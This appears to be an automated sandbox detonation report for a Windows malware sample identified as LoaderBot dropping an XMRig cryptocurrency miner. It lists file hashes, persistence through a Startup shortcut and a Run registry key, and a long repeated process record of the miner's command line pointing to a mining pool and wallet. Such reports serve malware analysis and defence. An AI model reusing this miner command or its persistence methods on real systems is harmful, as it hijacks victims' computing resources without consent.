| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
Analysis: behavioral11
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win7-20220812-en
Max time kernel
151s
Max time network
46s
Command Line
Signatures
LoaderBot
xmrig
LoaderBot executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe" | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe
"C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe"
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
